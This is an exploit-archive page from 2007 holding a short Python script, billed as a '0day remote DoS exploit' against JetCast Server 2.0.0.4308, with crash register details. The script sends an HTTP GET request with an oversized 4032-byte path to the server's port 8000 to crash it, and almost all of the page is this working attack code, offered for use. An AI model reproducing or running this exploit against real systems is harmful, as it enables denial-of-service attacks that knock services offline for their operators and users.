Home / exploits jetcast-dos.txt
Posted on 14 September 2007
#!/usr/bin/python """ ____ __ __/ ___|___ _ __ ___ / / | / _ | '__/ _ \n V /| |__| (_) | | | __/ \_/ \____\___/|_| \___| _ _ __ _ __ ___ ___ ___ _ __ | |_ ___ _ | '_ | '__/ _ / __|/ _ '_ | __/ __| |_| | |_) | | | __/\__ __/ | | | |_\__ _ | .__/|_| \___||___/\___|_| |_|\__|___/ |_| |_| _ _ // \// GENRE: //\PLOIT // ` PROGRAM: JetCast Server 2.0.0.4308 EXPLOiT TYPE: 0day remote DoS exploit EXPLOiT LANGUAGE: Python DEBUG iNFO: [Module JSMP3OGG] EAX 100355B8 JSMP3OGG.100355B8 ECX 00000007 EDX 00002000 EBX 00CB415A ESP 00DCDEC0 EBP 00DCDECC ESI 00000000 EDI 1002FA64 ASCII "Mozilla" EIP 1002737C JSMP3OGG.1002737C MOV AH,BYTE PTR DS:[ESI]; C0000005 (ACCESS VIOLATION) Bug found / exploit written by vCore <share0005@o2.pl> Tested on JetCast Server 2.0.0.4308 - Windows XP ServicePack2 ____ _ / ___|_ __| | ___ _ | | / _ / _` |/ _ |_| | |__| (_) | (_| | __/ _ \____\___/ \__,_|\___| |_| """ from time import sleep from socket import * target = '127.0.0.1' port = 8000 buf = "A" * 4032 header = ( 'GET /%s.mp3 HTTP/1.0 ' 'Host: %s ' 'User-Agent: WinampMPEG/5.19 ' 'Accept: */* ' 'Icy-MetaData:1 ' 'Connection: close ') % (buf, target) s = socket(AF_INET, SOCK_STREAM) s.connect((target, port)) s.send(header) sleep(2) s.close() print "DONE"
